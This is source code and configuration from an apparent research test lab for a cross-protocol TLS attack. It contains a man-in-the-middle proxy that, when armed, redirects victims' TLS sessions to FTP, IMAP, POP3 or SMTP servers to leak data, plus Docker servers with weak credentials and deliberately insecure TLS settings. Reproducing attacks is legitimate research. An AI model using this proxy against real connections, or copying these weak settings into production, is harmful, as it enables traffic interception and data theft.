MITMSocketProxy: 19 | def __init__(self, attacker_ip, attacker_port, target_ip, target_port, protocol): 20 | self.target_ip = target_ip 21 | self.target_port = target_port 22 | self.attacker_ip = attacker_ip 23 | self.attacker_port = attacker_port 24 | self.unarmed_target_ip = target_ip 25 | self.unarmed_target_port = 443 26 | self.connections = [] 27 | self.handler = protocol_handler[protocol](self.target_ip, self.target_port, self.unarmed_target_ip, self.unarmed_target_port) 28 | self.armed = False 29 | 30 | def run(self): 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 33 | 34 | start_new_thread(self.arm, ()) 35 | try: 36 | s.bind((self.attacker_ip, self.attacker_port)) 37 | s.listen(5) 38 | while True: 39 | client, address = s.accept() 40 | 
self.connections.append((client)) 41 | addr = AddressInfo(ip=address[0], port=address[1]) 42 | _info("mitmproxy.main", f"[{addr.ip}] Connection from {addr.ip}:{addr.port}") 43 | start_new_thread(self.handler.handle_connection, (addr, client, self.armed)) 44 | 45 | finally: 46 | s.close() 47 | 48 | def arm(self): 49 | while True: 50 | x = input("Press key to toggle armed state") 51 | self.armed = not self.armed 52 | for x in self.connections: 53 | x.close() 54 | _info("mitmproxy ", f"ARMED STATE: {self.armed}") 55 | 56 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/proxy/socket/protocols/__init__.py -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/ftp.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | ATTACK_FINISHED = 3 14 | 15 | 16 | class FTPHandler: 17 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 18 | self.status = defaultdict(int) 19 | self.target_ip = target_ip 20 | self.target_port = target_port 21 | self.unarmed_target_ip = unarmed_target_ip 22 | self.unarmed_target_port = unarmed_target_port 23 | 24 | def handle_connection(self, addr, client_socket, armed): 25 | if not armed: 26 | self._forward_http_traffic(addr, client_socket) 27 | else: 28 | if self.status[addr.ip] == FIRST_CONNECT: 29 | self._prepare_attack(addr, 
client_socket) 30 | elif self.status[addr.ip] == ATTACK_FINISHED: 31 | return 32 | else: 33 | self._leak_data(addr, client_socket) 34 | 35 | def _forward_http_traffic(self, addr, client_socket): 36 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 37 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 38 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 39 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 40 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 41 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 42 | 43 | def _prepare_attack(self, addr, client_socket): 44 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 45 | self.status[addr.ip] = ATTACK_PREPARATION_STARTED 46 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 47 | target_socket.connect((self.target_ip, self.target_port)) 48 | target_socket.recv(4096) 49 | target_socket.sendall(b"AUTH SSL\n") 50 | target_socket.recv(4096) 51 | 52 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 53 | 54 | self.status[addr.ip] = ATTACK_PREPARED 55 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack Preparation") 56 | 57 | def _leak_data(self, addr, client_socket): 58 | _info("mitmproxy.leak", f"[{addr.ip}] [RUN] Data Leakage") 59 | while self.status[addr.ip] is not ATTACK_PREPARED: 60 | time.sleep(1) 61 | 62 | client_hello = read_tls_packet(client_socket) 63 | 64 | for pasv_port in range(10090, 10101): 65 | try: 66 | _info("mitmproxy.leak", f"[{addr.ip}] Try to port {self.target_ip}:{pasv_port}") 67 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 68 | target_socket.connect((self.target_ip, pasv_port)) 69 | 70 | target_socket.sendall(client_hello) 71 | 72 | try: 73 | server_hello = read_tls_packet(target_socket) 74 | except: 75 | raise 
ConnectionRefusedError 76 | 77 | client_socket.sendall(server_hello) 78 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 79 | 80 | client_socket.close() 81 | target_socket.close() 82 | self.status[addr.ip] = ATTACK_FINISHED 83 | _info("mitmproxy.leak", f"[{addr.ip}] [FIN] Data Leakage") 84 | return 85 | except ConnectionRefusedError: 86 | _info("mitmproxy.leak", f"[{addr.ip}] ConnectionRefusedError") 87 | _error("mitmproxy.leak", "Cound not find open passive port") -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/imap.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | ATTACK_FINISHED = 3 14 | 15 | 16 | class IMAPHandler: 17 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 18 | self.status = defaultdict(int) 19 | self.target_ip = target_ip 20 | self.target_port = target_port 21 | self.unarmed_target_ip = unarmed_target_ip 22 | self.unarmed_target_port = unarmed_target_port 23 | 24 | def handle_connection(self, addr, client_socket, armed): 25 | if not armed: 26 | self._forward_http_traffic(addr, client_socket) 27 | else: 28 | self._execute_attack(addr, client_socket) 29 | 30 | def _forward_http_traffic(self, addr, client_socket): 31 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 32 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 33 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 35 | _info("mitmproxy.atck", 
f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 36 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 37 | 38 | def _execute_attack(self, addr, client_socket): 39 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 40 | self.status[addr.ip] = ATTACK_PREPARATION_STARTED 41 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | target_socket.connect((self.target_ip, self.target_port)) 43 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 44 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 45 | 46 | target_socket.sendall(b"1 STARTTLS\n") 47 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 48 | 49 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 50 | client_socket.close() 51 | 52 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 53 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/imaps.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | ATTACK_FINISHED = 3 14 | 15 | 16 | class IMAPSHandler: 17 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 18 | self.status = defaultdict(int) 19 | self.target_ip = target_ip 20 | self.target_port = target_port 21 | self.unarmed_target_ip = unarmed_target_ip 22 | self.unarmed_target_port = unarmed_target_port 23 | 24 | def handle_connection(self, addr, client_socket, armed): 25 | if not armed: 26 | self._forward_http_traffic(addr, client_socket) 27 | else: 28 | self._execute_attack(addr, client_socket) 29 
| 30 | def _forward_http_traffic(self, addr, client_socket): 31 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 32 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 33 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 35 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 36 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 37 | 38 | def _execute_attack(self, addr, client_socket): 39 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 40 | self.status[addr.ip] = ATTACK_PREPARATION_STARTED 41 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | target_socket.connect((self.target_ip, self.target_port)) 43 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 44 | 45 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 46 | client_socket.close() 47 | 48 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 49 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/pop3.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | 11 | class POP3Handler: 12 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 13 | self.status = defaultdict(int) 14 | self.target_ip = target_ip 15 | self.target_port = target_port 16 | self.unarmed_target_ip = unarmed_target_ip 17 | self.unarmed_target_port = unarmed_target_port 18 | 19 | def handle_connection(self, addr, client_socket, armed): 20 | if not armed: 21 | 
self._forward_http_traffic(addr, client_socket) 22 | else: 23 | self._execute_attack(addr, client_socket) 24 | 25 | def _forward_http_traffic(self, addr, client_socket): 26 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 27 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 28 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 30 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 31 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 32 | 33 | def _execute_attack(self, addr, client_socket): 34 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 35 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | target_socket.connect((self.target_ip, self.target_port)) 37 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 38 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 39 | 40 | target_socket.sendall(b"stls\n") 41 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}") 42 | 43 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 44 | client_socket.close() 45 | 46 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 47 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/pop3s.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | 11 | class POP3SHandler: 12 | def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port): 13 | self.status = defaultdict(int) 14 | 
self.target_ip = target_ip 15 | self.target_port = target_port 16 | self.unarmed_target_ip = unarmed_target_ip 17 | self.unarmed_target_port = unarmed_target_port 18 | 19 | def handle_connection(self, addr, client_socket, armed): 20 | if not armed: 21 | self._forward_http_traffic(addr, client_socket) 22 | else: 23 | self._execute_attack(addr, client_socket) 24 | 25 | def _forward_http_traffic(self, addr, client_socket): 26 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC") 27 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}{self.unarmed_target_port}") 28 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | target_socket.connect((self.unarmed_target_ip, self.unarmed_target_port)) 30 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}{self.unarmed_target_port}") 31 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 32 | 33 | def _execute_attack(self, addr, client_socket): 34 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation") 35 | target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | target_socket.connect((self.target_ip, self.target_port)) 37 | _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected") 38 | 39 | forward_tls_handshake_and_data(addr, client_socket, target_socket) 40 | client_socket.close() 41 | 42 | _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack") 43 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/protocols/smtp.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import time 3 | from collections import defaultdict 4 | 5 | from utils.logging import _info, _error 6 | from utils.tls import forward_tls_handshake_and_data 7 | 8 | from utils.tls import read_tls_packet 9 | 10 | FIRST_CONNECT = 0 11 | ATTACK_PREPARATION_STARTED = 1 12 | ATTACK_PREPARED = 2 13 | ATTACK_FINISHED = 3 
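class SMTPHandler:
    """MITM handler for the SMTP (STARTTLS) leg of the cross-protocol lab.

    ``handle_connection`` is the proxy's entry point for one accepted client
    socket.  Unarmed, the client's TLS records are relayed unchanged to the
    unarmed target.  Armed, the proxy opens a *plaintext* SMTP session to the
    target, upgrades it with STARTTLS, and then relays the victim's TLS
    handshake and application data into that upgraded session.
    """

    def __init__(self, target_ip, target_port, unarmed_target_ip, unarmed_target_port):
        # Per-client-IP progress marker (FIRST_CONNECT .. ATTACK_FINISHED);
        # defaultdict(int) makes an unseen client read as FIRST_CONNECT (0).
        self.status = defaultdict(int)
        self.target_ip = target_ip
        self.target_port = target_port
        self.unarmed_target_ip = unarmed_target_ip
        self.unarmed_target_port = unarmed_target_port

    def handle_connection(self, addr, client_socket, armed):
        """Dispatch one accepted connection.

        :param addr: AddressInfo(ip, port) of the connecting client.
        :param client_socket: accepted TCP socket; closed by the armed path.
        :param armed: False -> transparent relay, True -> STARTTLS attack.
        """
        if armed:
            self._execute_attack(addr, client_socket)
        else:
            self._forward_http_traffic(addr, client_socket)

    @staticmethod
    def _connect(ip, port):
        """Open a blocking TCP connection to ``(ip, port)`` and return it."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))
        return sock

    def _forward_http_traffic(self, addr, client_socket):
        """Unarmed path: relay TLS records 1:1 to the unarmed target."""
        _info("mitmproxy.atck", f"[{addr.ip}] [RUN] FORWARD HTTP TRAFFIC")
        # Fixed: ip and port used to be concatenated without a separator.
        _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECT TO {self.unarmed_target_ip}:{self.unarmed_target_port}")
        target_socket = self._connect(self.unarmed_target_ip, self.unarmed_target_port)
        try:
            _info("mitmproxy.atck", f"[{addr.ip}] [RUN] CONNECTED TO {self.unarmed_target_ip}:{self.unarmed_target_port}")
            forward_tls_handshake_and_data(addr, client_socket, target_socket)
        finally:
            # The original never closed the upstream socket (one leaked fd per
            # relayed connection).
            target_socket.close()

    def _execute_attack(self, addr, client_socket):
        """Armed path: upgrade a plaintext SMTP session with STARTTLS, then
        relay the victim's TLS records into it.

        NOTE(review): STARTTLS is sent without a preceding EHLO, which RFC 3207
        does not permit; this relies on the lab MTA accepting it anyway --
        confirm against the sendmail container before reusing elsewhere.
        """
        _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Attack Preparation")
        self.status[addr.ip] = ATTACK_PREPARATION_STARTED
        target_socket = self._connect(self.target_ip, self.target_port)
        try:
            _info("mitmproxy.atck", f"[{addr.ip}] [RUN] Target connected")
            # Greeting banner.  A single recv() is assumed to deliver the whole
            # (possibly multi-line) 220 banner -- true for the lab MTA, not in
            # general.
            _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {target_socket.recv(4096)}")

            # SMTP commands are CRLF-terminated (RFC 5321); the original sent a
            # bare LF, which most MTAs tolerate but which is not conformant.
            target_socket.sendall(b"STARTTLS\r\n")
            reply = target_socket.recv(4096)
            _info("mitmproxy.atck", f"[{addr.ip}] [RUN] {reply}")
            if not reply.startswith(b"220"):
                # Anything but "220 Ready to start TLS" means the server is
                # still in plaintext mode; relaying TLS records into it would
                # only yield a confusing handshake failure on the client side.
                _error("mitmproxy.atck", f"[{addr.ip}] [ERR] STARTTLS refused: {reply!r}")
                return
            self.status[addr.ip] = ATTACK_PREPARED

            forward_tls_handshake_and_data(addr, client_socket, target_socket)
            self.status[addr.ip] = ATTACK_FINISHED
        finally:
            target_socket.close()
            client_socket.close()
            _info("mitmproxy.atck", f"[{addr.ip}] [FIN] Attack")

-------------------------------------------------------------------------------- /testlab/mitmproxy/utils/__init__.py: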
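-------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/utils/__init__.py
-------------------------------------------------------------------------------- /testlab/mitmproxy/utils/common.py: --------------------------------------------------------------------------------
from collections import namedtuple

# (ip, port) pair describing one end of a proxied connection; the protocol
# handlers log ``addr.ip`` and key their per-client state on it.
AddressInfo = namedtuple("AddressInfo", ["ip", "port"])
-------------------------------------------------------------------------------- /testlab/mitmproxy/utils/logging.py: --------------------------------------------------------------------------------
import logging
from datetime import datetime
import os

# Shared by the console and the file handler (the original spelled the same
# format string out twice).
_FORMAT = '%(asctime)s %(name)-15s %(levelname)-8s %(message)s'


def init_logging(log_level, log_path=""):
    """Configure the root logger for console output and, optionally, a file.

    :param log_level: logging level (e.g. ``logging.INFO``) applied to the
        root logger and to the optional file handler.
    :param log_path: directory for the log file, created if missing.  The
        empty string (default) disables file logging.

    The file is named ``xprotocol_<YYYYmmdd_HHMMSS>.log`` and opened in
    ``'w'`` mode, so every run gets a fresh file.
    """
    logging.basicConfig(level=log_level, format=_FORMAT, datefmt='%d.%m.%Y %H:%M')

    if not log_path:
        return

    # exist_ok replaces the exists()/makedirs() pair of the original, which
    # raced with a concurrent creator and failed if the directory appeared
    # in between.
    os.makedirs(log_path, exist_ok=True)

    filename = "xprotocol_{}.log".format(datetime.now().strftime("%Y%m%d_%H%M%S"))
    fh = logging.FileHandler(os.path.join(log_path, filename), 'w')
    fh.setLevel(log_level)
    fh.setFormatter(logging.Formatter(_FORMAT))
    logging.getLogger().addHandler(fh)


def _log(logger, message, level):
    """Emit ``message`` at ``level`` on the named logger."""
    logging.getLogger(logger).log(level, message)


def _info(logger, message):
    _log(logger, message, logging.INFO)


def _debug(logger, message):
    _log(logger, message, logging.DEBUG)


def _warning(logger, message):
    _log(logger, message, logging.WARNING)


def _error(logger, message):
    _log(logger, message, logging.ERROR)


def _exception(logger, message):
    """Log ``message`` at ERROR level together with the active traceback."""
    logging.getLogger(logger).exception(message)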
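-------------------------------------------------------------------------------- /testlab/mitmproxy/utils/tls.py: --------------------------------------------------------------------------------
import select
import time

from utils.logging import _info, _debug


def read_tls_packet(conn):
    """Read exactly one TLS record (5-byte header plus payload) from ``conn``.

    :param conn: connected, blocking TCP socket.
    :returns: the raw record bytes, header included.
    :raises EOFError: if the peer closes the connection before a complete
        record has arrived, or if the header announces a zero-length record.

    The original looped forever when the peer closed mid-record: ``recv``
    returns ``b''`` on EOF, the byte count never advanced and the ``while``
    never terminated.  It also trusted a single ``recv(5)`` to return the
    whole header.  Both reads now go through an EOF-aware helper.
    """
    record_layer = _recv_exact(conn, 5)
    required_bytes = int.from_bytes(record_layer[3:5], 'big')
    if not required_bytes:
        raise EOFError("TLS record with zero-length payload")
    return record_layer + _recv_exact(conn, required_bytes)


def _recv_exact(conn, count, chunk=1000):
    """Block until ``count`` bytes have arrived on ``conn`` or the peer hangs up."""
    data = b''
    while len(data) < count:
        part = conn.recv(min(chunk, count - len(data)))
        if not part:
            raise EOFError("connection closed while reading TLS record")
        data += part
    return data


def forward_tls_handshake_and_data(addr, client_socket, server_socket):
    """Relay whole TLS records in both directions until either side stays
    silent for 4 seconds or disconnects.

    Records are forwarded unmodified and unparsed beyond the length field, so
    the proxy never needs session keys.  The caller owns both sockets; they
    are not closed here.

    :param addr: AddressInfo of the client (unused; kept for the call sites).
    """
    while True:
        try:
            readable, _, _ = select.select([client_socket, server_socket], [], [], 4)
            if not readable:
                break
            for sock in readable:
                if sock is client_socket:
                    # sendall: the original used send(), which may write only
                    # part of a record and desynchronise the TLS stream.
                    server_socket.sendall(read_tls_packet(client_socket))
                else:
                    client_socket.sendall(read_tls_packet(server_socket))
        except (EOFError, OSError, ValueError):
            # EOFError: peer closed; OSError: socket error/reset/timeout;
            # ValueError: select() on an already-closed socket.  Narrowed from
            # a bare ``except`` so KeyboardInterrupt still stops the proxy.
            _info("mitmproxy.tls ", f"TLS FORWARD ENDED")
            break
-------------------------------------------------------------------------------- /testlab/scripts/show_vsftp_log.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
# Tail the vsftpd transfer log and bob's "leak" file inside the running
# alpaca-vsftp container.  The compose file is resolved relative to this
# script, so it works from any working directory (the original glued `pwd`
# and `dirname "$0"` together, which breaks when invoked by absolute path).
set -euo pipefail

COMPOSE_FILE="$(cd "$(dirname "$0")/../servers" && pwd)/docker-compose.yml"
docker-compose -f "$COMPOSE_FILE" exec vsftp tail -f /var/log/vsftpd.log /home/vsftpd/bob/leak
-------------------------------------------------------------------------------- /testlab/servers/docker-compose.yml: --------------------------------------------------------------------------------
version: "3"
# Lab topology: target.com (127.0.0.2) and attacker.com (127.0.0.1) are added
# to /etc/hosts by testlab/setup.sh.  ./files/cert/ holds the lab CA's
# certificates *and private keys*, so every mount of it below is read-only.
#
# Review notes:
#  * The FTP (vsftp/proftpd) and mail (cyrus/courier/sendmail) services publish
#    on 0.0.0.0, i.e. on every interface of the host, with fixed weak
#    credentials (bob:12345) and deliberately weakened TLS settings.  Run the
#    lab only on an isolated host/VM, or bind them to 127.0.0.2 the way the
#    HTTP services are bound to 127.0.0.1.
#  * vsftp and proftpd both publish 20/21, cyrus and courier both publish 143:
#    start only one service of each pair at a time.
services:
  nginx-proxy:
    image: jwilder/nginx-proxy
    container_name: alpaca-nginx-proxy
    ports:
      - "127.0.0.1:80:80"
      - "127.0.0.1:443:443"
    volumes:
      # nginx-proxy needs the Docker socket to discover VIRTUAL_HOST containers;
      # even read-only, this is root-equivalent access to the Docker host.
      - /var/run/docker.sock:/tmp/docker.sock:ro
      - ./files/cert/:/etc/nginx/certs/:ro

  nginx-target:
    image: php:7.3-apache
    container_name: alpaca-nginx-target
    environment:
      - VIRTUAL_HOST=target.com
      - VIRTUAL_PORT=80
    volumes:
      - ./files/nginx-target/html/:/var/www/html/:ro

  nginx-attacker:
    image: nginx
    container_name: alpaca-nginx-attacker
    depends_on:
      - nginx-proxy
    environment:
      - VIRTUAL_HOST=attacker.com
    volumes:
      - ./files/nginx-attacker/html/:/usr/share/nginx/html/:ro

  vsftp:
    image: alpaca-vsftp
    build:
      context: files/ftp-vsftp/
    container_name: alpaca-vsftp
    tty: true
    volumes:
      - ./files/cert/:/opt/certs/:ro
      # Writable on purpose: the FTPS upload attack overwrites this file.
      - ./files/ftp-vsftp/payload.html:/home/vsftpd/bob/payload.html
    ports:
      - 0.0.0.0:20:20
      - 0.0.0.0:21:21
      - 0.0.0.0:10090-10100:10090-10100
    environment:
      - FTP_USER=bob
      - FTP_PASS=12345
      - PASV_MIN_PORT=10090
      - PASV_MAX_PORT=10100
      - REVERSE_LOOKUP_ENABLE=NO

  cyrus:
    image: alpaca-cyrus-imap
    build:
      context: files/mail-cyrus/
    container_name: alpaca-cyrus
    tty: true
    ports:
      - "0.0.0.0:143:143"
      - "0.0.0.0:993:993"
    volumes:
      - ./files/mail-cyrus/imapd.conf:/etc/imapd.conf
      - ./files/mail-cyrus/cyrus.conf:/etc/cyrus.conf
      - ./files/cert/:/tmp/ssl/:ro

  proftpd:
    image: alpaca-proftpd
    build:
      context: ./files/ftp-proftpd/
    container_name: alpaca-proftpd
    restart: unless-stopped
    tty: true
    environment:
      FTP_LIST: "bob:12345"
      USERADD_OPTIONS: "-o --gid 33 --uid 33"
    volumes:
      # Writable on purpose: upload target for the proftpd variant.
      - "./files/ftp-proftpd/bob:/home/bob"
      - "./files/cert/:/opt/ssl/:ro"
    ports:
      - 0.0.0.0:20:20
      - 0.0.0.0:21:21
      - 0.0.0.0:10101-10200:10101-10200

  courier:
    image: alpaca-courier
    build:
      context: ./files/mail-courier/
    container_name: alpaca-courier
    restart: unless-stopped
    ports:
      - "0.0.0.0:110:110"
      - "0.0.0.0:143:143"
    volumes:
      - "./files/cert/:/opt/ssl/:ro"
    tty: true

  sendmail:
    image: alpaca-sendmail
    build:
      context: files/mail-sendmail/
    container_name: alpaca-sendmail
    tty: true
    ports:
      - "0.0.0.0:25:25"
    volumes:
      - ./files/cert/:/tmp/certs/:ro
-------------------------------------------------------------------------------- /testlab/servers/files/ftp-proftpd/Dockerfile: --------------------------------------------------------------------------------
# NOTE(review): unpinned base image; pin a tag or digest (as ftp-vsftp does)
# so lab rebuilds stay reproducible.
FROM kibatic/proftpd

# COPY instead of ADD: identical for plain local files, and ADD's archive
# unpacking / URL fetching is never wanted for config files.
COPY proftpd.conf /etc/proftpd/proftpd.conf
COPY tls.conf /etc/proftpd/tls.conf

# Config files need no execute bit; 600 keeps them owner-only like the
# original 700 did.
RUN chmod 600 /etc/proftpd/proftpd.conf /etc/proftpd/tls.conf
-------------------------------------------------------------------------------- /testlab/servers/files/ftp-proftpd/bob/payload.html: --------------------------------------------------------------------------------







-------------------------------------------------------------------------------- /testlab/servers/files/ftp-proftpd/tls.conf: --------------------------------------------------------------------------------

# mod_tls settings for the proftpd lab target.  The certificate is the
# target.com leaf issued by the lab CA that testlab/setup.sh generates.
TLSEngine on
TLSLog /var/log/proftpd/tls.log
TLSRSACertificateFile /opt/ssl/target.com.crt
TLSRSACertificateKeyFile /opt/ssl/target.com.key
# Plaintext control and data connections are refused.
TLSRequired on
# NOTE(review): no TLSProtocol/TLSCipherSuite line, so mod_tls defaults apply;
# acceptable for the lab, but restrict to TLSv1.2+ before reusing this file.

-------------------------------------------------------------------------------- /testlab/servers/files/ftp-vsftp/Dockerfile: --------------------------------------------------------------------------------
# Base image pinned by digest: the lab depends on this exact vsftpd build and
# its start-up script (which appears to append settings to vsftpd.conf on
# every start -- see the note in vsftpd.conf).
FROM fauria/vsftpd@sha256:c3988c1b8418018a05688a0553986d87aa7c72a293ad7e74467972c1aad3d6b7

RUN touch /var/log/vsftpd.log

COPY vsftpd.conf /etc/vsftpd/vsftpd.conf
-------------------------------------------------------------------------------- /testlab/servers/files/ftp-vsftp/payload.html: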
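--------------------------------------------------------------------------------







-------------------------------------------------------------------------------- /testlab/servers/files/ftp-vsftp/vsftpd.conf: --------------------------------------------------------------------------------
# vsftpd configuration for the lab's FTPS target (virtual user "bob").
#
# Review notes:
#  * The committed file contained the same pasv_*/file_open_mode/local_umask/
#    xferlog_std_format block appended many more times (the base image's
#    start-up script appears to append its settings on every start, and the
#    result was checked in).  vsftpd processes the file in order and the last
#    assignment to a key wins, so the duplicates are collapsed here to their
#    final effective values -- nothing changes at run time.
#  * Several settings are deliberately weak for the attack demo and must not
#    be copied into a real deployment: write_enable + allow_writeable_chroot
#    (lets the upload attack plant files in bob's chroot), pasv_promiscuous
#    (disables the check that the data connection comes from the control
#    connection's peer), require_ssl_reuse=NO (data channels need not resume
#    the control-channel TLS session), seccomp_sandbox=NO, and ssl_tlsv1=YES
#    with no ssl_tlsv1_1/ssl_tlsv1_2 line -- check which protocol versions
#    this vsftpd build actually offers.
background=NO
anonymous_enable=NO

local_enable=YES
guest_enable=YES

virtual_use_local_privs=YES

write_enable=YES

pam_service_name=vsftpd_virtual

user_sub_token=$USER
local_root=/home/vsftpd/$USER

chroot_local_user=YES
allow_writeable_chroot=YES

hide_ids=YES

port_enable=YES
connect_from_port_20=YES
ftp_data_port=20

seccomp_sandbox=NO

pasv_max_port=10100
pasv_min_port=10090
pasv_addr_resolve=NO
pasv_enable=YES
pasv_promiscuous=YES
# Final value of the appended blocks.  Advertising 0.0.0.0 in PASV replies
# only works with clients that fall back to the control connection's peer
# address -- presumably what the lab clients do; verify before reusing.
pasv_address=0.0.0.0

file_open_mode=0666
local_umask=077
# Final value of the appended blocks (earlier occurrences said YES).
xferlog_std_format=NO

rsa_cert_file=/opt/certs/target.com.crt
rsa_private_key_file=/opt/certs/target.com.key


ssl_enable=YES
require_ssl_reuse=NO
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
ssl_ciphers=HIGH

allow_anon_ssl=NO

xferlog_enable=YES
xferlog_file=/var/log/vsftpd.log
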